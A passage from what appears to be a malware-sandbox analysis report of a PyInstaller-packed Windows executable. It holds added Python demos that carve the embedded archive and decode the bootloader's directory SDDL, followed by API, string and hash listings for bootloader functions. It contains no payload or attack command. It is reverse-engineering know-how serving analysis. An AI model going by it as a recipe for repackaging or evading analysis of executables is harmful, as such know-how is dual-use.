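ENTRY_SIZE = struct.calcsize(ENTRY_FMT)     # 18; the NUL-padded entry name follows


@dataclass
class TocEntry:
    name: str
    typecode: str          # 's' script, 'm' module, 'b' binary, 'z' PYZ, 'x' data, 'o' option
    offset: int            # relative to the start of the archive
    compressed_size: int
    uncompressed_size: int
    compressed: bool


def build_archive(entries, pyver=311, pylib=b"python311.dll"):
    """Constructed CArchive for this demo (not data from the sample).
    entries: iterable of (name, typecode, payload, compress)."""
    data, toc = b"", b""
    for name, typecode, payload, compress in entries:
        blob = zlib.compress(payload, 9) if compress else payload
        name_b = name.encode("utf-8") + b"\0"
        entry_len = ENTRY_SIZE + len(name_b)
        pad = (-entry_len) % 16          # the writer pads every entry to a 16-byte boundary
        toc += struct.pack(ENTRY_FMT, entry_len + pad, len(data), len(blob),
                           len(payload), int(compress), typecode.encode()) + name_b + b"\0" * pad
        data += blob
    pkg_len = len(data) + len(toc) + COOKIE_SIZE   # whole archive, cookie included
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyver, pylib)
    return data + toc + cookie


def find_cookie(exe):
    """Offset of the cookie, or -1 if no complete cookie is present ("Failed to read cookie!")."""
    pos = exe.rfind(MAGIC)
    return pos if pos >= 0 and pos + COOKIE_SIZE <= len(exe) else -1


def parse_archive(exe):
    """Read the cookie and walk the TOC. Returns (archive_start, pyver, pylib, entries)."""
    cookie_pos = find_cookie(exe)
    if cookie_pos < 0:
        raise ValueError("Failed to read cookie!")
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, exe, cookie_pos)
    # The archive start is derived from the cookie, so data appended after the
    # cookie (an Authenticode signature, for instance) does not shift the offsets.
    archive_start = cookie_pos + COOKIE_SIZE - pkg_len
    if archive_start < 0:
        raise ValueError("Cannot read Table of Contents.")
    toc = exe[archive_start + toc_off: archive_start + toc_off + toc_len]
    if len(toc) != toc_len:
        raise ValueError("Could not read full TOC!")
    entries, pos = [], 0
    while pos < toc_len:
        entry_len, off, csize, usize, flag, typecode = struct.unpack_from(ENTRY_FMT, toc, pos)
        if entry_len < ENTRY_SIZE or pos + entry_len > toc_len:
            raise ValueError("corrupt TOC entry at offset %d" % pos)
        name = toc[pos + ENTRY_SIZE: pos + entry_len].rstrip(b"\0").decode("utf-8")
        entries.append(TocEntry(name, typecode.decode(), off, csize, usize, bool(flag)))
        pos += entry_len
    return archive_start, pyver, pylib.rstrip(b"\0").decode(), entries


def extract_entry(exe, archive_start, entry):
    """Return one entry's payload, inflating it when the compressed flag is set."""
    start = archive_start + entry.offset
    blob = exe[start: start + entry.compressed_size]
    if len(blob) != entry.compressed_size:
        raise ValueError("Failed to extract %s: failed to read data chunk!" % entry.name)
    out = zlib.decompress(blob) if entry.compressed else blob
    if len(out) != entry.uncompressed_size:
        raise ValueError("Failed to extract %s: size mismatch" % entry.name)
    return out


def carve_all(exe):
    """Map of entry name -> payload for every TOC entry."""
    archive_start, _, _, entries = parse_archive(exe)
    return {e.name: extract_entry(exe, archive_start, e) for e in entries}


# Constructed sample: a fake PE stub, the archive, and a trailer after the cookie.
SAMPLE_ENTRIES = [
    ("main.py", "s", b"import os\nprint('hi')\n", True),
    ("helper.dll", "b", b"MZ" + b"\x90" * 30, False),
]
STUB = b"MZ" + b"\0" * 62 + b"\xcc" * 100
SAMPLE_EXE = STUB + build_archive(SAMPLE_ENTRIES) + b"\x30\x82" + b"\0" * 20

if __name__ == "__main__":
    start, pyver, pylib, entries = parse_archive(SAMPLE_EXE)
    print("archive at offset", start, "python", pyver, pylib)
    for e in entries:
        print(e)
```

Against a real sample, read the file into `exe` and call `carve_all`; the cookie's Python version and DLL name tell you which interpreter to use when decompiling the carved scripts, and a negative `find_cookie` result on a file flagged as PyInstaller usually means the overlay was truncated or the archive sits inside a resource rather than appended.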

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,?), ref: 00F5686E
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F56875
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,00000000,?), ref: 00F5688C (TOKEN_INFORMATION_CLASS 1 is TokenUser, not TokenIntegrityLevel, which is 25; this zero-size call only obtains the required buffer length)
• GetLastError.KERNEL32 ref: 00F56896
• GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?), ref: 00F568C5
                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00F568D6
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F568EE
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F5691B
                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 00F5693F
                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,?), ref: 00F5694E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                      • Opcode ID: fd31dcb2908cc6c3d9558a4040b8aaa2d2ee05368cea22a8aeaecb99b00890dc
                                                                                                                      • Instruction ID: 366b5da641f052b7a0655d211586edbde62c037c87c26d97b55c3eede81fffbe
                                                                                                                      • Opcode Fuzzy Hash: fd31dcb2908cc6c3d9558a4040b8aaa2d2ee05368cea22a8aeaecb99b00890dc
                                                                                                                      • Instruction Fuzzy Hash: AF31A271504315ABE720DF20DC49B9BBBE8EF48361F840919FA68D2191D774DA4CEBA3
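The call sequence above (OpenProcessToken, GetTokenInformation with the TokenUser class, ConvertSidToStringSidW, ConvertStringSecurityDescriptorToSecurityDescriptorW, CreateDirectoryW) together with the strings "D:(A;;FA;;;%s)" and "S-1-3-4" is the bootloader creating its extraction directory with a DACL containing a single allow ACE: FILE_ALL_ACCESS for the calling user's SID, with the OWNER RIGHTS SID S-1-3-4 substituted when the SID cannot be read from the token. The following added example (not code from this report or from the bootloader) reproduces the SDDL string and decodes it in Python so an analyst can see which trustees are granted what; temp_dir_sddl, parse_sddl, access_for, full_access_trustees and the sample SIDs are assumptions of the demo, while the rights codes, ACE syntax and SID aliases are those of the SDDL format.

```python
import re
from dataclasses import dataclass

# Access-right abbreviations (SDDL subset relevant to files and directories) and their mask bits.
RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
}
FILE_ALL_ACCESS = RIGHTS["FA"]
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
# Two-letter aliases SDDL accepts in place of a literal SID.
SID_ALIASES = {"OW": "S-1-3-4", "BA": "S-1-5-32-544", "SY": "S-1-5-18",
               "WD": "S-1-1-0", "BU": "S-1-5-32-545", "AU": "S-1-5-11"}
OWNER_RIGHTS_SID = "S-1-3-4"    # the fallback string in the function above


@dataclass
class Ace:
    ace_type: str   # ACCESS_ALLOWED / ACCESS_DENIED / SYSTEM_AUDIT
    flags: str      # inheritance flags, e.g. "OICI"
    mask: int       # access mask
    sid: str        # trustee as a literal SID string


def temp_dir_sddl(user_sid):
    """SDDL the bootloader formats for its extraction directory: one allow ACE
    with FILE_ALL_ACCESS for the calling user's SID, or for OWNER RIGHTS
    (S-1-3-4) when the user SID could not be read from the token."""
    return "D:(A;;FA;;;%s)" % (user_sid or OWNER_RIGHTS_SID)


def _parse_mask(text):
    if text.startswith("0x"):
        return int(text, 16)
    mask = 0
    for i in range(0, len(text), 2):
        code = text[i:i + 2]
        if code not in RIGHTS:
            raise ValueError("unsupported rights code %r" % code)
        mask |= RIGHTS[code]
    return mask


def _parse_sid(text):
    if text.startswith("S-"):
        return text
    if text in SID_ALIASES:
        return SID_ALIASES[text]
    raise ValueError("unsupported SID alias %r" % text)


def _parse_ace(text):
    # ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
    fields = text.split(";")
    if len(fields) != 6:
        raise ValueError("malformed ACE %r" % text)
    ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
    if ace_type not in ACE_TYPES:
        raise ValueError("unsupported ACE type %r" % ace_type)
    return Ace(ACE_TYPES[ace_type], flags, _parse_mask(rights), _parse_sid(sid))


def parse_sddl(sddl):
    """Split an SDDL string into owner, group, DACL flags and ACE lists."""
    result = {"owner": None, "group": None, "dacl_flags": "", "dacl": [], "sacl": []}
    for m in re.finditer(r"([OGDS]):((?:(?![OGDS]:).)*)", sddl):
        tag, body = m.group(1), m.group(2)
        if tag == "O":
            result["owner"] = _parse_sid(body)
        elif tag == "G":
            result["group"] = _parse_sid(body)
        else:
            flags = body.split("(", 1)[0]          # e.g. "P" = protected, no inherited ACEs
            aces = [_parse_ace(a) for a in re.findall(r"\(([^)]*)\)", body)]
            if tag == "D":
                result["dacl_flags"], result["dacl"] = flags, aces
            else:
                result["sacl"] = aces
    return result


def access_for(parsed, sid):
    """Effective mask for one SID from the DACL: allow bits minus deny bits.
    Group membership is not expanded; only direct trustee matches count."""
    allowed = denied = 0
    for ace in parsed["dacl"]:
        if ace.sid != sid:
            continue
        if ace.ace_type == "ACCESS_ALLOWED":
            allowed |= ace.mask
        elif ace.ace_type == "ACCESS_DENIED":
            denied |= ace.mask
    return allowed & ~denied


def full_access_trustees(parsed):
    """SIDs granted FILE_ALL_ACCESS outright by an allow ACE."""
    return sorted({a.sid for a in parsed["dacl"]
                   if a.ace_type == "ACCESS_ALLOWED" and a.mask & FILE_ALL_ACCESS == FILE_ALL_ACCESS})


# Constructed SID for the demo (no real account).
DEMO_USER_SID = "S-1-5-21-1000-2000-3000-1001"

if __name__ == "__main__":
    for sddl in (temp_dir_sddl(DEMO_USER_SID), temp_dir_sddl(None)):
        parsed = parse_sddl(sddl)
        print(sddl, "-> full access:", full_access_trustees(parsed),
              "Everyone:", hex(access_for(parsed, "S-1-1-0")))
```

The point the decoder makes visible: neither Everyone (S-1-1-0) nor Users appears in the DACL, so other local accounts get no access to the extracted files; in the fallback case the single trustee is OWNER RIGHTS rather than a concrete account, which still limits access to whoever owns the directory.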

Control-flow Graph (executed and not-executed blocks; graph image not preserved in this export): the function spans f644f5-f648a4. Win32 calls inside it are GetConsoleMode (f64779), ReadConsoleW (f64790) with GetLastError on its failure path (f647ac), and ReadFile (f647da) with GetLastError on its failure path (f6484e). Internal calls go to f5e606, f5e619, f63b33, f63b77, f65ba2, f64bdd, f6b43e, f5e5e3, f6420f, f64366 and f64060.
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3907804496
                                                                                                                      • Opcode ID: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction ID: a7a0e8eb29fb076b53c19a031dd8d6fd14bd5957a19ae675367737c91044f0fd
                                                                                                                      • Opcode Fuzzy Hash: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction Fuzzy Hash: B2C11575E04249AFCF15EFA8CC80BBDBBB0AF4A310F144159E9159B292C734AE41EB21

Control-flow Graph (executed and not-executed blocks; graph image not preserved in this export): the function spans f6e4d6-f6e7ff. Win32 calls inside it are GetFileType (f6e5fc), GetLastError (f6e5d1, f6e607, f6e7af) and CloseHandle (f6e607, f6e77a). Internal calls go to f6e2b2, f60904, f6e21d (the subcall that wraps CreateFileW, listed under APIs below), f6084f, f6e42c, f6dfca, f63cca, f5e5e3, f60a17, f5e606 and f5e619.
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F6E21D: CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E5EA
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E5F1
                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00F6E5FD
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E607
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E610
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E630
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E77D
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E7AF
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E7B6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                      • String ID: H
                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                      • Opcode ID: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction ID: a4914d0f7dfa9b9710d8b369e1f4e1515fb203e412ab33096a17686aa72cbc8c
                                                                                                                      • Opcode Fuzzy Hash: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction Fuzzy Hash: 69A14637A101189FCF19DF68DC51BEE3BA1AB06324F28015DE812EF292DB358D16EB51

Control-flow Graph (legend: Executed / Not Executed; graph not reproduced)

APIs
• _free.LIBCMT ref: 00F6D74F
• _free.LIBCMT ref: 00F6D91B
• _free.LIBCMT ref: 00F6D993
• GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$InformationTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 597776487-239921721
• Opcode ID: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
• Instruction ID: d825624d30430361a82a9d734e65692aca9072600b93619af88ae2d7305dddf3
• Opcode Fuzzy Hash: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
• Instruction Fuzzy Hash: 26A12472F00219AFDB10AFB4DC42ABE7BB8EF44720F144169E904A7191EB349E45FB91

Control-flow Graph (legend: Executed / Not Executed; graph not reproduced)

Strings
• malloc, xrefs: 00F510B6, 00F510E8
• Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00F5107E
• Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00F510B1
• Failed to extract %s: decompression resulted in return code %d!, xrefs: 00F511DE
• Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00F510E3
• 1.2.11, xrefs: 00F5104D
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID: 1.2.11$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 0-1060636955
• Opcode ID: 92f3772ba986257c0679539743479cca398b2f2067041c74c234505cf22c2d4e
• Instruction ID: 7f51e05d369b6216dd8425dd802cdf752b2134067000c3176bb48a8794fd94db
• Opcode Fuzzy Hash: 92f3772ba986257c0679539743479cca398b2f2067041c74c234505cf22c2d4e
• Instruction Fuzzy Hash: 1B51F771D043005BD3109F689C82B5BBBE8BF45762F04096DFF48D6282E765EA0CA793

Control-flow Graph (graph not reproduced)

APIs
  • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
  • Part of subcall function 00F60F12: SetConsoleCtrlHandler.KERNEL32(00F60B95,00000001,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F6102A
  • Part of subcall function 00F60F12: GetLastError.KERNEL32 ref: 00F61044
• GetStartupInfoW.KERNEL32(?), ref: 00F5616B
• GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 00F561FC
• CreateProcessW.KERNELBASE(?,00000000), ref: 00F5620B
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F5621B
• GetExitCodeProcess.KERNELBASE(?,00000000), ref: 00F56229
Strings
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Error creating child process!
• API String ID: 1248179626-3524285272
• Opcode ID: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
• Instruction ID: 07dea62a8891e7f97d8b8b6f8fcdbe468af907573e13a5ce9da34248cc774f38
• Opcode Fuzzy Hash: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
• Instruction Fuzzy Hash: DB319370A08344ABEB10EFA0CC4AB4B77E8AF44705F504919B694961C2DBFDD558EB53

Control-flow Graph (legend: Executed / Not Executed; graph not reproduced)

Strings
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
• Instruction ID: 378f146946c2a4c7c8d676ad1a4221bf3766984b1555ba7ffe014a561a214a2b
• Opcode Fuzzy Hash: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
• Instruction Fuzzy Hash: E1210A32E09325BBDB22AB349C44B5A77599F437BCF250523ED09A7292D630DE01F6E1

Control-flow Graph (rendering omitted; legend: Executed / Not Executed)
APIs
  • Part of subcall function 00F64DEE: GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00F64E36
• WriteFile.KERNELBASE(?,?,?,00F7F0D8,00000000,00000000,00000000,00000000,?,00F7F0D8,00000010,00F5BEDB,00000000,00000000,00000000), ref: 00F657A1
• GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00F657AB
• __dosmaperr.LIBCMT ref: 00F657EA
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
• String ID:
• API String ID: 910155933-0
• Opcode ID: 03ed0484e48cbcc678d9981a216c154793af50b87f5802fc9fdd5145aaa10335
• Instruction ID: bfd6f87ddc29423d1a46e34305079589e954682fe9c9ef9748d07abdeb478683
• Opcode Fuzzy Hash: 03ed0484e48cbcc678d9981a216c154793af50b87f5802fc9fdd5145aaa10335
• Instruction Fuzzy Hash: 2751D076D00A0AEBDF15DFA4CC05BEE7BB9AF55B24F180045E800BB152D635DA41FB61

Control-flow Graph (rendering omitted; legend: Executed / Not Executed)
APIs
• _free.LIBCMT ref: 00F6DB5D
  • Part of subcall function 00F6D933: _free.LIBCMT ref: 00F6D993
  • Part of subcall function 00F6D933: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$InformationTimeZone
• String ID:
• API String ID: 597776487-0
• Opcode ID: 5bffe0377b4ab1e74b585ff2c536d2b0c79aa92047fce57eb19db8f887b452ea
• Instruction ID: 95a12717d86a764bc90b88dd0a09c79ca27be616c30bf853eacc21f9e10e9777
• Opcode Fuzzy Hash: 5bffe0377b4ab1e74b585ff2c536d2b0c79aa92047fce57eb19db8f887b452ea
• Instruction Fuzzy Hash: C1212673E00319A6CB20AB358C45EBA73BCDFC0324F224265E565A7192EF749E45B650

Control-flow Graph (rendering omitted; legend: Executed / Not Executed)
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D20
• GetLastError.KERNEL32(?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D2A
• __dosmaperr.LIBCMT ref: 00F63D55
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
• Instruction ID: 1675435a84074543a518818187f7684e68433e5bb0626e246cdd708320fd5a51
• Opcode Fuzzy Hash: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
• Instruction Fuzzy Hash: CD018E33F0026C1BC2205374DC06B7E77884F82774F38025DF818971C2DE698E817290

Control-flow Graph (rendering omitted; legend: Executed / Not Executed)
APIs
• SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00F64BF3,00000000,00000000,00000002,00000000), ref: 00F64B7F
• GetLastError.KERNEL32(?,00F64BF3,00000000,00000000,00000002,00000000,?,00F656E7,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?), ref: 00F64B89
• __dosmaperr.LIBCMT ref: 00F64B90
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
• Instruction ID: ad79fd64dd8721ce693d9f515998a546d84c12524825a32f6cd3a6de087449d8
